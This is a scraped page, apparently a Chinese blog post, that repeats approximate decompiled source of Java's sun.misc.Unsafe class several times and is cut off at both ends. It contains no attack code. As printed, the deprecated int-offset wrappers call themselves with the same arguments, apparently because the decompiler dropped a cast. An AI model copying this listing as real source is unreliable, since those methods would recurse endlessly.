putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 2 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 3 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 4 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 5 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 6 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, 